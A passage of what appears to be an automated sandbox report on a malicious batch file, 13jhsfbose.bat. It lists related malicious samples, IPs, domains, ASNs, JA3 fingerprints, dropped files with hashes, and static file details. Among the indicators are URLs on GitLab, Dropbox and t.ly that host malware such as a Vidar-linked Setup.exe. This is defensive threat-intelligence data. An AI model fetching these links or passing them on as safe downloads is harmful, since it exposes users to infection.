                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 6448 because it is empty
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information

                                                                                                                                                              Simulations

                                                                                                                                                              Behavior and APIs

                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              02:47:14API Interceptor57x Sleep call for process: powershell.exe modified

                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                              IPs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              172.65.251.78build_setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                              • gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false
                                                                                                                                                              162.125.66.18scut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                  18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                    bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                      https://www.dropbox.com/l/scl/AAATBuomd5HmxEQWOFFl7juYr5pumA9OT78Get hashmaliciousUnknownBrowse
                                                                                                                                                                        https://www.dropbox.com/scl/fi/ghbickob35cseupehrevo/A-file-has-been-sent-to-you-via-DROPBOX.pdf?oref=e&r=ACTqvRbsSp0aGfWJ258Mnmig2JSiZYPEXawWQbeoOGqhLQ0A_g08q_6x9uCS3GDD06X2I92wp1DOmKpzocpy-33mPeFHFTHNUnOplz6Tt7UNKnGCY5hdeIU9t4fHEX4CzcseX3o9vxkcg76RpGddDTfgU6DIWzrB6Y3NN3SHwd0oXjHE8-2WVTMkcFhAlN56hFRzwFRs7uWEYIbpWWN2yfXr&sm=1&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                          Metro Plastics Technologies.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                            https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                                                                                                                                                                              https://t.ly/ZPR23.10Get hashmaliciousUnknownBrowse
                                                                                                                                                                                https://careers.adobe.com/us/en/apply?jobSeqNo=ADOBUSR147673EXTERNALENUSGet hashmaliciousUnknownBrowse

                                                                                                                                                                                  Domains

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  gitlab.comkQ3WxQb6bw.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  36yw96m7Ni.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  scut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  m2.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  SecuriteInfo.com.FileRepMalware.25861.18393.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  SecuriteInfo.com.FileRepMalware.25861.18393.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  2plugin27724.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  edge-block-www-env.dropbox-dns.comscut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                  bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                  18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                  bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                  protected.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 162.125.65.15
                                                                                                                                                                                  https://dl.dropboxusercontent.com/scl/fi/95is2w1ywjvorzayt88dp/DKM-0192PDF.zip?rlkey=svoej4s4tb5lwbnvthtgrmokl&st=d99zdn1k&dl=0Get hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                  https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                  https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                  https://t.ly/ZPR23.10Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                  https://mariculturasalinas.com/za/zap/enter.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 162.125.66.15
                                                                                                                                                                                  www-env.dropbox-dns.comscut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                  bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                  18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                  bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                  https://www.dropbox.com/l/scl/AABC0x3zULW7L39lSlgXhTBIyuorli3cJh8Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 162.125.65.18
                                                                                                                                                                                  protected.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 162.125.65.18
                                                                                                                                                                                  https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                                                                                                                                                                                  • 162.125.65.18
                                                                                                                                                                                  FW Reminder Steve Daugherty shared ALAMO1 _ AGREEMENT.paper with you.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 162.125.67.18
                                                                                                                                                                                  Metro Plastics Technologies.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 162.125.65.18
                                                                                                                                                                                  https://www.dropbox.com/l/scl/AAATBuomd5HmxEQWOFFl7juYr5pumA9OT78Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 162.125.67.18

                                                                                                                                                                                  ASNs

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  CLOUDFLARENETUSkQ3WxQb6bw.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  36yw96m7Ni.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  scut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                  bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  https://www.google.es/url?q=queryri4m(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fmediamei.com.br%2fdada%2funcz66ahtgqg1jqqmvsnfzkcw2oylxhqc48ee/YW5pbWFsaWFAYW5pbWFsaWEubm8=$?Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.17.25.14
                                                                                                                                                                                  INV-#000497053.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.21.2.83
                                                                                                                                                                                  DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                  DROPBOXUSscut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                  bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                  18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                  bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                  https://www.dropbox.com/l/scl/AABC0x3zULW7L39lSlgXhTBIyuorli3cJh8Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 162.125.1.20
                                                                                                                                                                                  protected.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 162.125.65.18
                                                                                                                                                                                  meerkat.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 162.125.189.88
                                                                                                                                                                                  https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                                                                                                                                                                                  • 162.125.67.15
                                                                                                                                                                                  FW Reminder Steve Daugherty shared ALAMO1 _ AGREEMENT.paper with you.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 162.125.70.18
                                                                                                                                                                                  Metro Plastics Technologies.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 162.125.1.20

                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0ekQ3WxQb6bw.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                  36yw96m7Ni.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                  scut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                  TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                  bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                  18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                  bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                  Factura modificada____678979879.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                  DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  • 162.125.66.18
                                                                                                                                                                                  XoZ8DeZQxR.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 172.65.251.78
                                                                                                                                                                                  • 162.125.66.18

                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                  No context

                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                  Entropy (8bit):0.6599547231656377
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:NlllulTl/l/:NllUT
                                                                                                                                                                                  MD5:206C63AE62B267B3875F6B8BC88BCF9E
                                                                                                                                                                                  SHA1:E486A199952A8AADFDDACA7270526EDA9B69D4C8
                                                                                                                                                                                  SHA-256:54391607237C0855CAAED77F5BCE377BD8A887DDAE7D3547ECC84572D227A6E1
                                                                                                                                                                                  SHA-512:A947BE25EA4696C5F86749A071158445B2B2BB279FA7A479D0FFFDB25ED44AF823532AFFEC176DA6B82EF50CD2652EB8D7FB9798BEADD6CE781C3B745DBE4FFD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:@...e...........................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0w5t1qnw.aox.psm1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nh4q5jb.nw3.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cvfuun5a.wgx.psm1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dliew4nv.ohw.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hu2ysc13.b2e.psm1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kypzqzbg.5uv.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lep5xbbc.101.psm1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogzbiama.lgg.psm1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_va2fqzxb.1nq.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzhgfgtk.rrx.ps1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                  C:\Users\user\Desktop\tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):14
                                                                                                                                                                                  Entropy (8bit):3.521640636343319
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Mrv:gv
                                                                                                                                                                                  MD5:CE585C6BA32AC17652D2345118536F9C
                                                                                                                                                                                  SHA1:BE0E41B3690C42E4C0CDB53D53FC544FB46B758D
                                                                                                                                                                                  SHA-256:589C942E748EA16DC86923C4391092707CE22315EB01CB85B0988C6762AA0ED3
                                                                                                                                                                                  SHA-512:D397EDA475D6853CE5CC28887690DDD5F8891BE43767CDB666396580687F901FB6F0CC572AFA18BDE1468A77E8397812009C954F386C8F69CC0678E1253D5752
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:ECHO is off...

                                                                                                                                                                                  \Device\Null

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\find.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):36
                                                                                                                                                                                  Entropy (8bit):3.8956388075276664
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:gOmAe9qQn:xm/
                                                                                                                                                                                  MD5:89D484A82D15549C8F4BF2B4D4F1E924
                                                                                                                                                                                  SHA1:58F49E997A58A17C2902E08026BAC2DD16A34B1B
                                                                                                                                                                                  SHA-256:040AE1183CD6102AC612B2D88C2816B358FDC4743BC9CD05376E797595167B40
                                                                                                                                                                                  SHA-512:C0C920A9369FF9E28C9DAE6CA21AE7A1F9A79F2F4F8F97E247D133700FC446CEAA2C6C40116DE644CEA9336D9064792F3AD7011EBCBF5B6675779C57590F167B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:FIND: Parameter format not correct..

                                                                                                                                                                                  Static File Info

                                                                                                                                                                                  General

                                                                                                                                                                                  File type:Unicode text, UTF-16, little-endian text, with very long lines (16565), with no line terminators
                                                                                                                                                                                  Entropy (8bit):5.527116883376201
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                                                                                                                                                                  • MP3 audio (1001/1) 33.33%
                                                                                                                                                                                  File name:13jhsfbose.bat
                                                                                                                                                                                  File size:33'133 bytes
                                                                                                                                                                                  MD5:dfdf2f2e7d7b6f1275a657b61a07374f
                                                                                                                                                                                  SHA1:e280342e751b3029b944072bdd1b4cee057fa6a4
